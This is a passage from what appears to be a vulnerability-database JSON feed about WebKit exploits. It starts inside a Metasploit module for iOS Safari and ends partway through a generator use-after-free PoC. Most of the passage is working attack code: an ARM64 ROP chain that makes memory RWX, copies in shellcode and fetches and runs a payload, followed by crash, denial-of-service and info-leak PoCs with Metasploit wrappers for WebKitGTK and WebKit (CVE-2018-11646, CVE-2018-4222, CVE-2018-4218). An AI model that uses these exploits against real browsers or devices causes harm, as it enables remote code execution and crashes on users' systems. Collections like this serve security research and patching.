\nvar codeAddr = Sub(memPoolEnd, shsz); \ncodeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff); \n \nmemory.writeInt64(Add(vtab, 0x18), longjmp); \nmemory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget) \n \nvar arrsz = 0x100000, \noff = 0x1000; \nvar arr = new Uint32Array(arrsz); \nvar stack = memory.readInt64(Add(stage1.addrof(arr), 0x10)); \n \nvar pos = arrsz - off; \n \nvar add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) { 
\nx4 = x4 || Int64.Zero \n \n// in stackloader: \narr[pos++] = 0xdead0010; // unused \narr[pos++] = 0xdead0011; // unused \narr[pos++] = 0xdead0012; // unused \narr[pos++] = 0xdead0013; // unused \narr[pos++] = dispatch.lo(); // x28 (gadget for regloader) \narr[pos++] = dispatch.hi(); // x28 (gadget for regloader) \narr[pos++] = 0xdead0014; // x27 (unused) \narr[pos++] = 0xdead0015; // x27 (unused) \narr[pos++] = x4.lo(); // x26 == x4 (arg5) \narr[pos++] = x4.hi(); // x26 == x4 (arg5) \narr[pos++] = x3.lo(); // x25 == x3 (arg4) \narr[pos++] = x3.hi(); // x25 == x3 (arg4) \narr[pos++] = x2.lo(); // x24 == x2 (arg3) \narr[pos++] = x2.hi(); // x24 == x2 (arg3) \narr[pos++] = x0.lo(); // x23 == x0 (arg1) \narr[pos++] = x0.hi(); // x23 == x0 (arg1) \narr[pos++] = x1.lo(); // x22 == x1 (arg2) \narr[pos++] = x1.hi(); // x22 == x1 (arg2) \narr[pos++] = func.lo(); // x21 (func) \narr[pos++] = func.hi(); // x21 (func) \narr[pos++] = 0xdbad0018; // x20 (unused) \narr[pos++] = 0xdbad0019; // x20 (unused) \narr[pos++] = 0xdead001a; // x19 (unused) \narr[pos++] = 0xdead001b; // x19 (unused) \nvar tmppos = pos; \narr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29 \narr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29 \narr[pos++] = regloader.lo(); // x30 (first gadget) \narr[pos++] = regloader.hi(); // x30 (first gadget) \n \n// after dispatch: \narr[pos++] = 0xdead0020; // unused \narr[pos++] = 0xdead0021; // unused \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \narr[pos++] = 0xdead0024; // x22 (unused) \narr[pos++] = 0xdead0025; // x22 (unused) \narr[pos++] = 0xdead0026; // x21 (unused) \narr[pos++] = 0xdead0027; // x21 (unused) \narr[pos++] = 0xdead0028; // x20 (unused) \narr[pos++] = 0xdead0029; // x20 (unused) \narr[pos++] = 0xdead002a; // x19 (unused) \narr[pos++] = 0xdead002b; // x19 (unused) \ntmppos = pos; \narr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29 \narr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29 \narr[pos++] = 
jump_to.lo(); // x30 (gadget) \narr[pos++] = jump_to.hi(); // x30 (gadget) \n} \n \nvar add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) { \n//alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`); \n//x4 = x4 || Int64.One \n// in stackloader: \narr[pos++] = 0xdead0010; // unused \narr[pos++] = 0xdead0011; // unused \narr[pos++] = 0xdead0012; // unused \narr[pos++] = 0xdead0013; // unused \narr[pos++] = 0xdead1101; // x28 (unused) \narr[pos++] = 0xdead1102; // x28 (unused) \narr[pos++] = 0xdead0014; // x27 == x6 (unused) \narr[pos++] = 0xdead0015; // x27 == x6 (unused) \narr[pos++] = 0xdead0016; // x26 (unused) \narr[pos++] = 0xdead0017; // x26 (unused) \narr[pos++] = x3.lo(); // x25 == x3 (arg4) \narr[pos++] = x3.hi(); // x25 == x3 (arg4) \narr[pos++] = x0.lo(); // x24 == x0 (arg1) \narr[pos++] = x0.hi(); // x24 == x0 (arg1) \narr[pos++] = x2.lo(); // x23 == x2 (arg3) \narr[pos++] = x2.hi(); // x23 == x2 (arg3) \narr[pos++] = x3.lo(); // x22 == x3 (arg4) \narr[pos++] = x3.hi(); // x22 == x3 (arg4) \narr[pos++] = func.lo(); // x21 (target for dispatch) \narr[pos++] = func.hi(); // x21 (target for dispatch) \narr[pos++] = 0xdead0018; // x20 (unused) \narr[pos++] = 0xdead0019; // x20 (unused) \nvar tmppos = pos; \narr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = 0xdead001c; // x29 (unused) \narr[pos++] = 0xdead001d; // x29 (unused) \narr[pos++] = ldrx8.lo(); // x30 (next gadget) \narr[pos++] = ldrx8.hi(); // x30 (next gadget) \n \n// in ldrx8 \nif (x4) { \narr[pos++] = stackloader.lo(); \narr[pos++] = stackloader.hi(); \n} else { \narr[pos++] = dispatch.lo(); // x8 (target for regloader) \narr[pos++] = dispatch.hi(); // x8 (target for regloader) \n} \narr[pos++] = 0xdead1401; // (unused) \narr[pos++] = 0xdead1402; // (unused) \narr[pos++] = 0xdead1301; // x20 (unused) \narr[pos++] = 0xdead1302; 
// x20 (unused) \narr[pos++] = x1.lo(); // x19 == x1 (arg2) \narr[pos++] = x1.hi(); // x19 == x1 (arg2) \narr[pos++] = 0xdead1201; // x29 (unused) \narr[pos++] = 0xdead1202; // x29 (unused) \narr[pos++] = regloader.lo(); // x30 (next gadget) \narr[pos++] = regloader.hi(); // x30 (next gadget) \n \n// in regloader \n// NOTE: REGLOADER DOES NOT ADJUST SP! \n// sometimes i didn't get expected value in x4 \n// and i have no fucking idea why \n// usleep likely did the trick, but I would still keep the code \n// with movx4 \n//arr[pos++] = x4.lo() // x4 (should be -- but see lines above) \n//arr[pos++] = x4.hi() // x4 (should be -- but see lines above) \n \nif (x4) { \n// in stackloader: \narr[pos++] = 0xdaad0010; // unused \narr[pos++] = 0xdaad0011; // unused \narr[pos++] = 0xdaad0012; // unused \narr[pos++] = 0xdaad0013; // unused \narr[pos++] = 0xdaad1101; // x28 (unused) \narr[pos++] = 0xdaad1102; // x28 (unused) \narr[pos++] = 0xdaad0014; // x27 == x6 (unused) \narr[pos++] = 0xdaad0015; // x27 == x6 (unused) \narr[pos++] = 0xdaad0016; // x26 (unused) \narr[pos++] = 0xdaad0017; // x26 (unused) \narr[pos++] = 0xdaad0018; // x25 (unused) \narr[pos++] = 0xdaad0019; // x25 (unused) \narr[pos++] = 0xdaad00f0; // x24 (unused) \narr[pos++] = 0xdaad00f1; // x24 (unused) \narr[pos++] = 0xdaad00f2; // x23 (unused) \narr[pos++] = 0xdaad00f3; // x23 (unused) \narr[pos++] = 0xdaad00f4; // x22 (unused) \narr[pos++] = 0xdaad00f5; // x22 (unused) \narr[pos++] = func.lo(); // x21 (target for dispatch) \narr[pos++] = func.hi(); // x21 (target for dispatch) \narr[pos++] = 0xdaad0018; // x20 (unused) \narr[pos++] = 0xdaad0019; // x20 (unused) \ntmppos = pos; \narr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = 0xdaad001c; // x29 (unused) \narr[pos++] = 0xdaad001d; // x29 (unused) \narr[pos++] = ldrx8.lo(); // x30 (next gadget) \narr[pos++] = ldrx8.hi(); // 
x30 (next gadget) \n \n// in ldrx8 \narr[pos++] = dispatch.lo(); // x8 (target for movx4) \narr[pos++] = dispatch.hi(); // x8 (target for movx4) \narr[pos++] = 0xdaad1401; // (unused) \narr[pos++] = 0xdaad1402; // (unused) \narr[pos++] = x4.lo(); // x20 == x4 (arg5) \narr[pos++] = x4.hi(); // x20 == x4 (arg5) \narr[pos++] = 0xdaad1301; // x19 (unused) \narr[pos++] = 0xdaad1302; // x19 (unused) \narr[pos++] = 0xdaad1201; // x29 (unused) \narr[pos++] = 0xdaad1202; // x29 (unused) \narr[pos++] = movx4.lo(); // x30 (next gadget) \narr[pos++] = movx4.hi(); // x30 (next gadget) \n} \n \n// after dispatch: \n \n// keep only one: these or 0xdeaded01 \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \n \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \narr[pos++] = 0xdead0024; // x22 (unused) \narr[pos++] = 0xdead0025; // x22 (unused) \narr[pos++] = 0xdead0026; // x21 (unused) \narr[pos++] = 0xdead0027; // x21 (unused) \narr[pos++] = 0xdead0028; // x20 (unused) \narr[pos++] = 0xdead0029; // x20 (unused) \narr[pos++] = 0xdead002a; // x19 (unused) \narr[pos++] = 0xdead002b; // x19 (unused) \narr[pos++] = 0xdead002c; // x29 (unused) \narr[pos++] = 0xdead002d; // x29 (unused) \narr[pos++] = jump_to.lo(); // x30 (gadget) \narr[pos++] = jump_to.hi(); // x30 (gadget) \n} \n \nvar add_call = function(func, x0, x1, x2, x3, x4, jump_to) { \nx0 = x0 || Int64.Zero \nx1 = x1 || Int64.Zero \nx2 = x2 || Int64.Zero \nx3 = x3 || Int64.Zero \njump_to = jump_to || stackloader \n \nreturn (ldrx8 ? add_call_via_x8 : add_call_llvm)( \nfunc, x0, x1, x2, x3, x4, jump_to \n) \n} \n \n#{ios_11 ? 
' \nif (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) { \nadd_call(jitWriteSeparateHeaps \n, Sub(codeAddr, memPoolStart) // off \n, paddr // src \n, shsz // size \n); \n} else { \nfail(\"jitWrite\"); \n} \n' : ' \nadd_call(mach_vm_protect, \nmach_task_self_, // task \ncodeAddr, // addr \nshsz, // size \nnew Int64(0), // set maximum \nnew Int64(7) // prot (RWX) \n); \n \nadd_call(memmove, \ncodeAddr, // dst \npaddr, // src \nshsz // size \n); \n'} \n \nadd_call(codeAddr, \ndlopen, \ndlsym, \njitWriteSeparateHeaps, \nmemPoolStart, \nmemPoolEnd, \n); \n \nfor(var i = 0; i < 0x20; ++i) \n{ \narr[pos++] = 0xde00c0de + (i<<16); \n} \n \nvar sp = Add(stack, (arrsz - off) * 4); \nmemory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29 \nmemory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp) \n \n// trigger \n//print(\"u rdy?\") \nwrapper.addEventListener(\"click\", function(){}); \n \n} \n \n#{get_mem_rw} \n \nfunction go() { \ntry { \nvar req = new XMLHttpRequest; \nreq.open(\"GET\", \"exploit\"); \nreq.responseType = \"arraybuffer\"; \nreq.addEventListener(\"load\", function() { \ntry { \nif (req.responseType != \"arraybuffer\") throw \"y u no blob\"; \npayload.set(new Uint8Array(req.response), 0x0); \npwn(); \n} catch (e) { \nfail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\")) \n} \n}); \nreq.addEventListener(\"error\", function(ev) { \nfail(ev) \n}); \nreq.send() \n} catch (e) { \nfail(\"Error: \" + e + (e != null ? 
\" \" + e.stack : \"\")) \n} \n}; \n \ngo(); \n \n</script> \n</body> \n</html> \n^ \nunless datastore['DEBUG_EXPLOIT'] \nhtml.gsub!(/\\/\\/.*$/, '') # strip comments \nhtml.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/153148/webkit_createthis.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:55", "description": "\nWebKitGTK+ 2.21.3 - WebKitFaviconDatabase Denial of Service (Metasploit)", "edition": 1, "published": "2018-06-11T00:00:00", "title": "WebKitGTK+ 2.21.3 - WebKitFaviconDatabase Denial of Service (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "EXPLOITPACK:031DF743451446CD96638EB1AA5E6C47", "href": "", "sourceData": "##\n# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS\n# Author: Dhiraj Mishra\n# Date: 2018-06-11\n# CVE: 2018-11646\n#\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\n 'Description' => %q(\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Dhiraj Mishra', # Original discovery, disclosure\n 'Hardik Mehta', # Original discovery, disclosure\n 'Zubin Devnani', # Original discovery, disclosure\n 'Manuel Caballero' #JS Code\n ],\n 'References' => [\n ['EDB', 
'44842'],\n ['CVE', '2018-11646'],\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\n ],\n 'DisclosureDate' => 'Jun 03 2018',\n 'Actions' => [[ 'WebServer' ]],\n 'PassiveActions' => [ 'WebServer' ],\n 'DefaultAction' => 'WebServer'\n )\n )\n end\n\n def run\n exploit # start http server\n end\n\n def setup\n @html = <<-JS\n<script type=\"text/javascript\">\n win = window.open(\"WIN\", \"WIN\");\n window.open(\"http://example.com/\", \"WIN\");\n win.document.execCommand('stop');\n win.document.write(\"HelloWorld\");\n win.document.close();\n</script>\n JS\n end\n\n def on_request_uri(cli, _request)\n print_status('Sending response')\n send_response(cli, @html)\n end\nend", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:55", "description": "\nWebKitGTK+ 2.21.3 - Crash (PoC)", "edition": 1, "published": "2018-06-05T00:00:00", "title": "WebKitGTK+ 2.21.3 - Crash (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-05T00:00:00", "id": "EXPLOITPACK:C7B5D1AF7C2C90DC97EDE10892A220CC", "href": "", "sourceData": "# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) \n# Author: Dhiraj Mishra\n# Date: 2018-06-05\n# Software: https://webkitgtk.org/\n# CVE: CVE-2018-11646\n# Summary:\n# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in \n# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, \n# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.\n\n# PoC:\n\n<script>\nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \nwindow.open(\"https://www.paypal.com\", \"WIN\"); \nwin.document.execCommand('Stop'); \nwin.document.write(\"Spoofed URL\"); \nwin.document.close();\n</script>\n\n\nBacktrace using fedora 27:\n\n#0 WTF::StringImpl::rawHash\nat 
/usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508\n#1 WTF::StringImpl::hasHash\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514\n#2 WTF::StringImpl::hash\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525\n#3 WTF::StringHash::hash\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73\n#9 WTF::HashMap, WTF::HashTraits >::get\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406\n#10 webkitFaviconDatabaseSetIconURLForPageURL\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193\n#11 webkitFaviconDatabaseSetIconForPageURL\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318\n#12 webkitWebViewSetIcon\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964\n#13 WTF::Function::performCallbackWithReturnValue\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108\n#15 WebKit::WebPageProxy::dataCallback\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083\n#16 WebKit::WebPageProxy::finishedLoadingIcon\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848\n#17 IPC::callMemberFunctionImpl::operator()\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68\n#29 WTF::RunLoop::::_FUN(gpointer)\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70\n#30 g_main_dispatch\nat gmain.c line 3148\n#31 g_main_context_dispatch\nat gmain.c line 3813\n#32 g_main_context_iterate\nat gmain.c line 3886\n#33 g_main_context_iteration\nat gmain.c line 3947x\n#34 g_application_run\nat gapplication.c line 
2401\n#35 main\nat ../src/ephy-main.c line 432 \n\n\n# Reference's:\n# https://bugs.webkit.org/show_bug.cgi?id=186164\n# https://bugzilla.gnome.org/show_bug.cgi?id=795740", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2018-06-05T20:05:30", "description": "WebKitGTK+ < 2.21.3 - Crash (PoC). CVE-2018-11646. Local exploit for Linux platform", "published": "2018-06-05T00:00:00", "type": "exploitdb", "title": "WebKitGTK+ < 2.21.3 - Crash (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-05T00:00:00", "id": "EDB-ID:44842", "href": "https://www.exploit-db.com/exploits/44842/", "sourceData": "# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) \r\n# Author: Dhiraj Mishra\r\n# Date: 2018-06-05\r\n# Software: https://webkitgtk.org/\r\n# CVE: CVE-2018-11646\r\n# Summary:\r\n# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in \r\n# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, \r\n# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.\r\n\r\n# PoC:\r\n\r\n<script>\r\nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \r\nwindow.open(\"https://www.paypal.com\", \"WIN\"); \r\nwin.document.execCommand('Stop'); \r\nwin.document.write(\"Spoofed URL\"); \r\nwin.document.close();\r\n</script>\r\n\r\n\r\nBacktrace using fedora 27:\r\n\r\n#0 WTF::StringImpl::rawHash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508\r\n#1 WTF::StringImpl::hasHash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514\r\n#2 WTF::StringImpl::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525\r\n#3 WTF::StringHash::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73\r\n#9 WTF::HashMap, WTF::HashTraits >::get\r\nat 
/usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406\r\n#10 webkitFaviconDatabaseSetIconURLForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193\r\n#11 webkitFaviconDatabaseSetIconForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318\r\n#12 webkitWebViewSetIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964\r\n#13 WTF::Function::performCallbackWithReturnValue\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108\r\n#15 WebKit::WebPageProxy::dataCallback\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083\r\n#16 WebKit::WebPageProxy::finishedLoadingIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848\r\n#17 IPC::callMemberFunctionImpl::operator()\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68\r\n#29 WTF::RunLoop::::_FUN(gpointer)\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70\r\n#30 g_main_dispatch\r\nat gmain.c line 3148\r\n#31 g_main_context_dispatch\r\nat gmain.c line 3813\r\n#32 g_main_context_iterate\r\nat gmain.c line 3886\r\n#33 g_main_context_iteration\r\nat gmain.c line 3947x\r\n#34 g_application_run\r\nat gapplication.c line 2401\r\n#35 main\r\nat ../src/ephy-main.c line 432 \r\n\r\n\r\n# Reference's:\r\n# https://bugs.webkit.org/show_bug.cgi?id=186164\r\n# https://bugzilla.gnome.org/show_bug.cgi?id=795740", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44842/"}, {"lastseen": "2018-06-11T23:41:12", "description": "WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS. CVE-2018-11646. 
Dos exploit for Linux platform", "published": "2018-06-11T00:00:00", "type": "exploitdb", "title": "WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "EDB-ID:44876", "href": "https://www.exploit-db.com/exploits/44876/", "sourceData": "##\r\n# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS\r\n# Author: Dhiraj Mishra\r\n# Date: 2018-06-11\r\n# CVE: 2018-11646\r\n#\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\r\n 'Description' => %q(\r\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\r\n If successful, it could lead to application crash, resulting in denial of service.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Dhiraj Mishra', # Original discovery, disclosure\r\n 'Hardik Mehta', # Original discovery, disclosure\r\n 'Zubin Devnani', # Original discovery, disclosure\r\n 'Manuel Caballero' #JS Code\r\n ],\r\n 'References' => [\r\n ['EDB', '44842'],\r\n ['CVE', '2018-11646'],\r\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\r\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2018',\r\n 'Actions' => [[ 'WebServer' ]],\r\n 'PassiveActions' => [ 'WebServer' ],\r\n 'DefaultAction' => 'WebServer'\r\n )\r\n )\r\n end\r\n\r\n def run\r\n exploit # start http server\r\n end\r\n\r\n def setup\r\n @html = <<-JS\r\n<script type=\"text/javascript\">\r\n win = window.open(\"WIN\", \"WIN\");\r\n window.open(\"http://example.com/\", \"WIN\");\r\n win.document.execCommand('stop');\r\n win.document.write(\"HelloWorld\");\r\n 
win.document.close();\r\n</script>\r\n JS\r\n end\r\n\r\n def on_request_uri(cli, _request)\r\n print_status('Sending response')\r\n send_response(cli, @html)\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44876/"}, {"lastseen": "2018-06-08T18:24:41", "description": "WebKit - WebAssembly Compilation Info Leak. CVE-2018-4222. Dos exploit for Multiple platform", "published": "2018-06-08T00:00:00", "type": "exploitdb", "title": "WebKit - WebAssembly Compilation Info Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4222"], "modified": "2018-06-08T00:00:00", "id": "EDB-ID:44859", "href": "https://www.exploit-db.com/exploits/44859/", "sourceData": "<!--\r\nThere is an out-of-bounds read when compiling WebAssembly source buffers in WebKit. When a source buffer is compiled, it is first copied into a read-only buffer by the functuion getWasmBufferFromValue. This function returns the code buffer as follows:\r\n\r\nreturn arrayBufferView ? static_cast<uint8_t*>(arrayBufferView->vector()) : static_cast<uint8_t*>(arrayBuffer->impl()->data());\r\n\r\nIf the source buffer is a view (DataView or TypedArray), arrayBufferView->vector() is returned. The vector() method returns the start of the data in the buffer, including any offset. However, the function createSourceBufferFromValue copies the output of this function as follows:\r\n\r\nmemcpy(result.data(), data + byteOffset, byteSize);\r\n\r\nThis means that if the buffer is a view, the offset is added to the buffer twice before this is copied. This could allow memory off the heap to be read out of the source buffer, either though parsing exceptions or data sections when they are copied. 
A minimal PoC for the issue is:\r\n\r\nvar b2 = new ArrayBuffer(1000);\r\nvar view = new Int8Array(b2, 700);\r\nvar mod = new WebAssembly.Module(a);\r\n\r\nAn HTML file the consistently crashes Safari is attached.\r\n-->\r\n\r\n<html><body><script>\r\nfor(var q = 0; q < 100; q++){\r\nvar i = Math.random();\r\ni = Math.round(i*0x20000000);\r\ni = Math.abs(i);\r\nvar b2 = new Uint8Array( i);\r\nconsole.log(\"i\" + i);\r\nvar j = Math.random();\r\nj = j*i;\r\nj = Math.round(j);\r\nj = Math.abs(j);\r\nconsole.log(\"j\"+j)\r\nvar view2 = new DataView(b2.buffer,j);\r\ntry{\r\nvar mod = new WebAssembly.Module(view2);\r\n}catch(e){\r\nconsole.log(e);\r\n}\r\n}\r\n</script></body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44859/"}, {"lastseen": "2018-06-08T18:24:45", "description": "WebKit - Use-After-Free when Resuming Generator. CVE-2018-4218. Dos exploit for Multiple platform. Tags: Use After Free (UAF)", "published": "2018-06-08T00:00:00", "type": "exploitdb", "title": "WebKit - Use-After-Free when Resuming Generator", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4218"], "modified": "2018-06-08T00:00:00", "id": "EDB-ID:44861", "href": "https://www.exploit-db.com/exploits/44861/", "sourceData": "<!--\r\nIn WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:\r\n\r\n var state = this.@generatorState;\r\n\r\nand set by calling:\r\n\r\n generator.@generatorState = @GeneratorStateExecuting;\r\n\r\n\r\nChecking that the @generator property is set is also used in place of type checking the generator.\r\n\r\nTherefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. 
However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.\r\n\r\nIt is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.\r\n\r\nGenerators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.\r\n\r\nA minimal sample of the script causing this problem is below, and a full PoC is attached.\r\n\r\nvar iterator;\r\n\r\nvar a = [];\r\n\r\nfunction* foo(index) {\r\n\r\n while (1) {\r\n var q = a.pop();\r\n if(q){\r\n \tq.__proto__ = iterator;\r\n \t q.next();\r\n }\r\n yield index++;\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n yield;\r\n}\r\n\r\nvar temp = foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){ // make a few objects with @generatorState set\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n\r\niterator = foo(0);\r\n\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next().value);\r\n-->\r\n\r\n<html><body><script>\r\nprint = console.log;\r\nprint(\"top\");\r\nvar iterator;\r\nvar o = function(){print(\"hello\")};\r\nvar a = [];\r\nfunction* foo(index) {\r\n //print(\"start\");\r\n\r\n while (1) {\r\n //if(index == 77){\r\n // o = 0;\r\n // gc(); \r\n//\tindex = 2;\r\n // var a = [1, 2, 3, 4];\r\n\t//yield 9;\r\n //print(\"a vale \" + a[0]);\r\n //}\r\n //if(index == 1){\r\n //index = 77;\r\n // print(\"INTERNAL CALL\")\r\n // iterator.next();\r\n //index++;\r\n\r\n //}\r\n //var b = [1, 2, 3, 4];\r\n var q = a.pop();\r\n if(q){\r\n print(\"here1\");\r\n q.__proto__ = iterator;\r\n q.next();\r\n 